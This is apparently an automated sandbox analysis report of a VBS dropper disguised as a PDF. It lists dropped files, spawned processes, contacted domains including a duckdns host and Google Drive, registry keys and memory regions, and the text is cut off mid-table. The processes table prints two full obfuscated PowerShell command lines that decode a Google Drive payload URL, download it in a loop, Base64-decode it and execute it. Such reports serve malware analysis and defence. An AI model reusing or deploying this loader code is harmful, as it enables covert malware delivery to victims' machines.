Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
A 413736796#U00b7pdf.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1hikc4af.mwx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1pex4s5l.gtq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3fi2q2dr.4qz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zoatdjyt.5qa.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Sternman224.Ill
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\A 413736796#U00b7pdf.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren
#>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If
($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate
-lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ .
($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0
U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk
v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek
AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di
co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120
'.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes.
X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku
d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl
irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120
'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen
(Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su
lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg
orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn
ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,.
Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo
trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo
arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr
CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd
eoSolbatElekto UnoccNervio Fritl PrecTBill ySkr.bpLdreceNavne] rodu: Prpa:Cos.uTPecullBecrisCorre1Pikan2M cac ');$Exaltations=$Seriately[0];$Nongratifying=(Omhng120
'Songo$ AlumgM slyl RidsOStedmBRadioADel.nLOutpe:d skod O diy CaddeChampmMy coawindskPortaiSh ngN ccengSquad=ContaNPal ee
BoerwGa,le- askOEtrusbP ppaJ postepursuCOran TBirac Arla sDrayiyt mposNonexTBo igeDruckmDiaki. BetinSlyngeVu.tuTRin e.VakuuwGanjaEOligabTils,cPirusLIntuiiDumdretrichnSkylltEndos
');Stungen ($Nongratifying);Stungen (Omhng120 'Donkr$ Int DPos ty MisteAncismTac.ya CounkFremeiSoftnnSubskgtwa d. iltrHCollieP
steaUno edNa.opeumba ranodesRmega[Misto$SarifOMultidGlo,se RondlColomeCharat Medb]Front= List$ .aktATaktat OvertStra.r KlipiGlaurbPiratuOvonit
stanvinde r CruodSpot iT.teleHous,rBeta nutense Reag ');$indledningers=Omhng120 'Inter$ .urpD L,ddyUnde eUncoummisdoaPer ek
stofi.ebninjesuigG mcr. AlviD umfooDecenw ndsntevanlModneoMa agaKolbedSoldeF HeliiUn.nel Imdee riv( Kont$LektuEMavesx BinaaSkak.lXyloftInteraInjektTv
reiMandjoFlippn Forms orag, gi t$SrklaMKrakee c epgBlamaaUnstar IjmaaInsti)psyko ';$Megara=$Istandsttende;Stungen (Omhng120
'Ndtrf$ ouquG tooll rikiOAlmacBOpfriaToothlProd :GefilD Inteo BesiNTyphousoci tBitniSLaman= njoi(gmelitResurEBaandsFlas,t
Ildr-otozop AddraB,styt omfrHPeasa Chaws$TrnermBl baEBrideGBeroeaBlyglrAfsteABland)Omfo, ');while (!$Donuts) {Stungen (Omhng120
'Delef$JentrgRiflilKem koColosbUnsu a Schel exah:HvlviDBec siFrontdP ecrySesqunListeaUdfldmSucrai GaveaThion=Udrad$.utoltOmbytrfrogfu.lleseW,yme
') ;Stungen $indledningers;Stungen (Omhng120 'StiffSPreobtColosaLaeotrS tratChiff- UdasSVouchlJews eSepale opplpBinds Abote4Leads
');Stungen (Omhng120 'Hastv$T.ikogOve flL veroJ,nglbDeadwa selelOmgng:Asse DHvneroStemnnMang,uOwnsutLakfasPri,r= U ex(bo igT
PacheCiff sOv.rptOldeb-Pa,esP ChiaaUl entU sanhUse e To on$ UnguM VermeGenkog BlodaF,dlar adioaRasor)Obers ') ;Stungen (Omhng120
'Overs$Utakng AllelCl,sso Bu,nbForlaa VedllForha:RevirT ,ouraNonsem Ro deHayag= Med $Telefg WiltlmoutooHetaebel,owaIndf,lmonos:
EnerFHandsiSiks lPretrmLun rsDromot summr Derbi EctomPoli mPhotoeOve,nlHuers+Acina+Disbe%Under$,andsS ungeeUnb arReseriAccu.a
Gen tunhare fblalSlummyAnt.r.LaramcSmallo SkyduAfskrnSybiltMaves ') ;$Exaltations=$Seriately[$Tame];}$Eksekverbare=282308;$trikstank=31667;Stungen
(Omhng120 'C rom$ motigCirculTagryoMiliebForloaG.bbel S pr:NonemJBlacku Eftel orudeAllerm BluneForbis puppsNoveme LrernidiomsWab,t
Repe=Akupu .aatGAdelseAandftGen r- maniCInsinoGrnsen EgentL,tbee reennFraflt ndel Unr p$.outiMro aieOpkalgGutsiaPilferKle
oa She, ');Stungen (Omhng120 ' ore$Forsvgtmmerl Ens o CarbbPseudaRkkevlBev s:FormaEAspacxS ptopC rkelFriediFj rncFlyn aSunfibSvaeriLokall
Nippi roustBlaahyTopsp rind=W shi Retor[ xureSNotoryTil.ys salvtContaeEmanumneote.KefsfCAu tlo.odifnHyn,sv Reole DamprL.gkatNumbb]Skatt:Proec:MetteFF
dusrSkitsoChargmInterBBe liaStvnisforfeeCro.k6 egle4 itheSFrosttLatherAmpleiAblatnPrologPalae(Belam$ Au oJDe maustranlGoyineEndotmCommieSeggas
ecisMali.e NectnAntics Akti)Besla ');Stungen (Omhng120 'Missu$SubvegfravrlTaksto portb Re saNinetlGalvv:Leg nTFlymehTrapioEnh
dmCordiiBrugesD cklt Ac u Uddan=Confi Afpa[ MetaS Ect y Genes.ipsot harie rdomm Stev.Musk,TOmproeSek nx Othatindkr. SecaEAlv
onEctrocOrigioErkyndBryoniSneadnVillig ,ntr]Soci :rgneh:StilmABrnepS ynonCP.laeISaracIBetj .SeersGUndereEnwrit pannS Umrktbassar
trici otanGamb g over( Coxe$DrapeE Se uxN,nmapCranilFerdyiSleigcKamgaaAdaptb Gappi.aabul Tek iFolket DiacyDisco) Farv ');Stungen
(Omhng120 'Samme$CircugTasselVens.oRhi ebS elnaBothilThaum:HvidkoHoggepMolalsMet gt BesktO teaeIndbanGonord StateDem t=Downv$DisemTNaturhUn
raoBagr.mPersoiSprkfs Blegt M zz.Hove.sDe,umuanstrbEmbiosJydettOptakrT staiBeslanRsonngP haw( .iva$TanisE R.mpkLymphsHu hjedaakakD
shevVrvleeHeracrSubcob So aa A derSamleeParti, apot$Laze.tM diarShoppi Foolk fluisForgat ver aUndernportskD,tal)Echiu ');Stungen
$opsttende;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren
#>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If
($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate
-lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ .
($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0
U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk
v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek
AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di
co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120
'.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes.
X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku
d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl
irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120
'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen
(Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su
lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg
orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn
ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,.
Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo
trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo
arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr
CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd
eoSolbatElekto UnoccNervio Fritl PrecTBill ySkr.bpLdreceNavne] rodu: Prpa:Cos.uTPecullBecrisCorre1Pikan2M cac ');$Exaltations=$Seriately[0];$Nongratifying=(Omhng120
'Songo$ AlumgM slyl RidsOStedmBRadioADel.nLOutpe:d skod O diy CaddeChampmMy coawindskPortaiSh ngN ccengSquad=ContaNPal ee
BoerwGa,le- askOEtrusbP ppaJ postepursuCOran TBirac Arla sDrayiyt mposNonexTBo igeDruckmDiaki. BetinSlyngeVu.tuTRin e.VakuuwGanjaEOligabTils,cPirusLIntuiiDumdretrichnSkylltEndos
');Stungen ($Nongratifying);Stungen (Omhng120 'Donkr$ Int DPos ty MisteAncismTac.ya CounkFremeiSoftnnSubskgtwa d. iltrHCollieP
steaUno edNa.opeumba ranodesRmega[Misto$SarifOMultidGlo,se RondlColomeCharat Medb]Front= List$ .aktATaktat OvertStra.r KlipiGlaurbPiratuOvonit
stanvinde r CruodSpot iT.teleHous,rBeta nutense Reag ');$indledningers=Omhng120 'Inter$ .urpD L,ddyUnde eUncoummisdoaPer ek
stofi.ebninjesuigG mcr. AlviD umfooDecenw ndsntevanlModneoMa agaKolbedSoldeF HeliiUn.nel Imdee riv( Kont$LektuEMavesx BinaaSkak.lXyloftInteraInjektTv
reiMandjoFlippn Forms orag, gi t$SrklaMKrakee c epgBlamaaUnstar IjmaaInsti)psyko ';$Megara=$Istandsttende;Stungen (Omhng120
'Ndtrf$ ouquG tooll rikiOAlmacBOpfriaToothlProd :GefilD Inteo BesiNTyphousoci tBitniSLaman= njoi(gmelitResurEBaandsFlas,t
Ildr-otozop AddraB,styt omfrHPeasa Chaws$TrnermBl baEBrideGBeroeaBlyglrAfsteABland)Omfo, ');while (!$Donuts) {Stungen (Omhng120
'Delef$JentrgRiflilKem koColosbUnsu a Schel exah:HvlviDBec siFrontdP ecrySesqunListeaUdfldmSucrai GaveaThion=Udrad$.utoltOmbytrfrogfu.lleseW,yme
') ;Stungen $indledningers;Stungen (Omhng120 'StiffSPreobtColosaLaeotrS tratChiff- UdasSVouchlJews eSepale opplpBinds Abote4Leads
');Stungen (Omhng120 'Hastv$T.ikogOve flL veroJ,nglbDeadwa selelOmgng:Asse DHvneroStemnnMang,uOwnsutLakfasPri,r= U ex(bo igT
PacheCiff sOv.rptOldeb-Pa,esP ChiaaUl entU sanhUse e To on$ UnguM VermeGenkog BlodaF,dlar adioaRasor)Obers ') ;Stungen (Omhng120
'Overs$Utakng AllelCl,sso Bu,nbForlaa VedllForha:RevirT ,ouraNonsem Ro deHayag= Med $Telefg WiltlmoutooHetaebel,owaIndf,lmonos:
EnerFHandsiSiks lPretrmLun rsDromot summr Derbi EctomPoli mPhotoeOve,nlHuers+Acina+Disbe%Under$,andsS ungeeUnb arReseriAccu.a
Gen tunhare fblalSlummyAnt.r.LaramcSmallo SkyduAfskrnSybiltMaves ') ;$Exaltations=$Seriately[$Tame];}$Eksekverbare=282308;$trikstank=31667;Stungen
(Omhng120 'C rom$ motigCirculTagryoMiliebForloaG.bbel S pr:NonemJBlacku Eftel orudeAllerm BluneForbis puppsNoveme LrernidiomsWab,t
Repe=Akupu .aatGAdelseAandftGen r- maniCInsinoGrnsen EgentL,tbee reennFraflt ndel Unr p$.outiMro aieOpkalgGutsiaPilferKle
oa She, ');Stungen (Omhng120 ' ore$Forsvgtmmerl Ens o CarbbPseudaRkkevlBev s:FormaEAspacxS ptopC rkelFriediFj rncFlyn aSunfibSvaeriLokall
Nippi roustBlaahyTopsp rind=W shi Retor[ xureSNotoryTil.ys salvtContaeEmanumneote.KefsfCAu tlo.odifnHyn,sv Reole DamprL.gkatNumbb]Skatt:Proec:MetteFF
dusrSkitsoChargmInterBBe liaStvnisforfeeCro.k6 egle4 itheSFrosttLatherAmpleiAblatnPrologPalae(Belam$ Au oJDe maustranlGoyineEndotmCommieSeggas
ecisMali.e NectnAntics Akti)Besla ');Stungen (Omhng120 'Missu$SubvegfravrlTaksto portb Re saNinetlGalvv:Leg nTFlymehTrapioEnh
dmCordiiBrugesD cklt Ac u Uddan=Confi Afpa[ MetaS Ect y Genes.ipsot harie rdomm Stev.Musk,TOmproeSek nx Othatindkr. SecaEAlv
onEctrocOrigioErkyndBryoniSneadnVillig ,ntr]Soci :rgneh:StilmABrnepS ynonCP.laeISaracIBetj .SeersGUndereEnwrit pannS Umrktbassar
trici otanGamb g over( Coxe$DrapeE Se uxN,nmapCranilFerdyiSleigcKamgaaAdaptb Gappi.aabul Tek iFolket DiacyDisco) Farv ');Stungen
(Omhng120 'Samme$CircugTasselVens.oRhi ebS elnaBothilThaum:HvidkoHoggepMolalsMet gt BesktO teaeIndbanGonord StateDem t=Downv$DisemTNaturhUn
raoBagr.mPersoiSprkfs Blegt M zz.Hove.sDe,umuanstrbEmbiosJydettOptakrT staiBeslanRsonngP haw( .iva$TanisE R.mpkLymphsHu hjedaakakD
shevVrvleeHeracrSubcob So aa A derSamleeParti, apot$Laze.tM diarShoppi Foolk fluisForgat ver aUndernportskD,tal)Echiu ');Stungen
$opsttende;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
a458386d9.duckdns.org
|
|
||
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://drive.googP2
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 11 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
172.217.16.206
|
||
|
drive.usercontent.google.com
|
142.250.184.193
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.217.16.206
|
drive.google.com
|
United States
|
||
|
142.250.184.193
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8CF0000
|
direct allocation
|
page execute and read and write
|
|
|
|
611D000
|
trusted library allocation
|
page read and write
|
|
|
|
BDEC000
|
direct allocation
|
page execute and read and write
|
|
|
|
29190071000
|
trusted library allocation
|
page read and write
|
|
|
|
9B28000
|
heap
|
page read and write
|
|
|
|
2504AD11000
|
heap
|
page read and write
|
||
|
2504AE25000
|
heap
|
page read and write
|
||
|
291EBAA0000
|
heap
|
page read and write
|
||
|
2504ADE3000
|
heap
|
page read and write
|
||
|
73FB000
|
stack
|
page read and write
|
||
|
2918048C000
|
trusted library allocation
|
page read and write
|
||
|
7959000
|
heap
|
page read and write
|
||
|
7FFB4B220000
|
trusted library allocation
|
page execute and read and write
|
||
|
D0DABFF000
|
stack
|
page read and write
|
||
|
A32D57E000
|
stack
|
page read and write
|
||
|
2504AE39000
|
heap
|
page read and write
|
||
|
25048E50000
|
heap
|
page read and write
|
||
|
3508000
|
heap
|
page read and write
|
||
|
D0DA5DA000
|
stack
|
page read and write
|
||
|
9A76000
|
heap
|
page read and write
|
||
|
786E000
|
stack
|
page read and write
|
||
|
7891000
|
heap
|
page read and write
|
||
|
25048F2A000
|
heap
|
page read and write
|
||
|
7FFB4B2A0000
|
trusted library allocation
|
page read and write
|
||
|
A32CD2E000
|
stack
|
page read and write
|
||
|
29180558000
|
trusted library allocation
|
page read and write
|
||
|
9945000
|
heap
|
page read and write
|
||
|
5F99000
|
trusted library allocation
|
page read and write
|
||
|
8730000
|
heap
|
page read and write
|
||
|
92AC000
|
remote allocation
|
page execute and read and write
|
||
|
7FFB4B2B9000
|
trusted library allocation
|
page read and write
|
||
|
7BD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
291EDCCA000
|
heap
|
page read and write
|
||
|
9A60000
|
direct allocation
|
page read and write
|
||
|
8740000
|
trusted library allocation
|
page read and write
|
||
|
29181C55000
|
trusted library allocation
|
page read and write
|
||
|
3130000
|
trusted library section
|
page read and write
|
||
|
7FFB4B320000
|
trusted library allocation
|
page read and write
|
||
|
E80000
|
heap
|
page read and write
|
||
|
8C60000
|
trusted library allocation
|
page read and write
|
||
|
591C000
|
trusted library allocation
|
page read and write
|
||
|
3710000
|
heap
|
page execute and read and write
|
||
|
25048EB3000
|
heap
|
page read and write
|
||
|
87F0000
|
heap
|
page read and write
|
||
|
7917000
|
heap
|
page read and write
|
||
|
291804FC000
|
trusted library allocation
|
page read and write
|
||
|
8D70000
|
trusted library allocation
|
page execute and read and write
|
||
|
24FAE000
|
stack
|
page read and write
|
||
|
7FFB4B490000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B450000
|
trusted library allocation
|
page read and write
|
||
|
2504ACE0000
|
heap
|
page read and write
|
||
|
7991000
|
heap
|
page read and write
|
||
|
7FFB4B400000
|
trusted library allocation
|
page read and write
|
||
|
8835000
|
trusted library allocation
|
page read and write
|
||
|
251C0000
|
remote allocation
|
page read and write
|
||
|
29181CAF000
|
trusted library allocation
|
page read and write
|
||
|
291EB8F0000
|
heap
|
page read and write
|
||
|
8A1C000
|
stack
|
page read and write
|
||
|
34DE000
|
stack
|
page read and write
|
||
|
8790000
|
trusted library allocation
|
page read and write
|
||
|
25049100000
|
heap
|
page read and write
|
||
|
7410000
|
direct allocation
|
page read and write
|
||
|
291EBC35000
|
heap
|
page read and write
|
||
|
291ED9B6000
|
heap
|
page read and write
|
||
|
60AC000
|
remote allocation
|
page execute and read and write
|
||
|
291EBB90000
|
trusted library allocation
|
page read and write
|
||
|
7C40000
|
trusted library allocation
|
page read and write
|
||
|
25048EB3000
|
heap
|
page read and write
|
||
|
25048E90000
|
heap
|
page read and write
|
||
|
29180086000
|
trusted library allocation
|
page read and write
|
||
|
3580000
|
heap
|
page read and write
|
||
|
291EBB30000
|
heap
|
page read and write
|
||
|
A32CCA3000
|
stack
|
page read and write
|
||
|
251FE000
|
stack
|
page read and write
|
||
|
7C60000
|
trusted library allocation
|
page read and write
|
||
|
291EB9F0000
|
heap
|
page read and write
|
||
|
304E000
|
stack
|
page read and write
|
||
|
9A80000
|
direct allocation
|
page read and write
|
||
|
29181C6D000
|
trusted library allocation
|
page read and write
|
||
|
2918076E000
|
trusted library allocation
|
page read and write
|
||
|
291EBAEE000
|
heap
|
page read and write
|
||
|
291ED4F5000
|
heap
|
page read and write
|
||
|
99DE000
|
unkown
|
page read and write
|
||
|
291EDC82000
|
heap
|
page read and write
|
||
|
B3EC000
|
direct allocation
|
page execute and read and write
|
||
|
291ED410000
|
trusted library allocation
|
page read and write
|
||
|
78B1000
|
heap
|
page read and write
|
||
|
25048F22000
|
heap
|
page read and write
|
||
|
24AE0000
|
direct allocation
|
page read and write
|
||
|
7FFB4B3F0000
|
trusted library allocation
|
page read and write
|
||
|
291EDA38000
|
heap
|
page read and write
|
||
|
7BE0000
|
trusted library allocation
|
page read and write
|
||
|
3182000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1B0000
|
trusted library allocation
|
page read and write
|
||
|
29190010000
|
trusted library allocation
|
page read and write
|
||
|
DBEC000
|
direct allocation
|
page execute and read and write
|
||
|
7FFB4B360000
|
trusted library allocation
|
page read and write
|
||
|
2E8C000
|
stack
|
page read and write
|
||
|
7400000
|
direct allocation
|
page read and write
|
||
|
9B2B000
|
heap
|
page read and write
|
||
|
25048F1F000
|
heap
|
page read and write
|
||
|
25048EC1000
|
heap
|
page read and write
|
||
|
2504ADF4000
|
heap
|
page read and write
|
||
|
9A90000
|
direct allocation
|
page read and write
|
||
|
87E0000
|
trusted library allocation
|
page read and write
|
||
|
B37E000
|
stack
|
page read and write
|
||
|
291EDCAA000
|
heap
|
page read and write
|
||
|
25048E7F000
|
heap
|
page read and write
|
||
|
35F7000
|
heap
|
page read and write
|
||
|
291ED470000
|
heap
|
page execute and read and write
|
||
|
8650000
|
trusted library allocation
|
page execute and read and write
|
||
|
78C1000
|
heap
|
page read and write
|
||
|
291EBA5E000
|
heap
|
page read and write
|
||
|
29181C78000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2E5000
|
trusted library allocation
|
page read and write
|
||
|
25048F38000
|
heap
|
page read and write
|
||
|
7BA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25048F4C000
|
heap
|
page read and write
|
||
|
7FFB4B3B0000
|
trusted library allocation
|
page read and write
|
||
|
2504ADE0000
|
heap
|
page read and write
|
||
|
7FFB4B350000
|
trusted library allocation
|
page read and write
|
||
|
A32D17D000
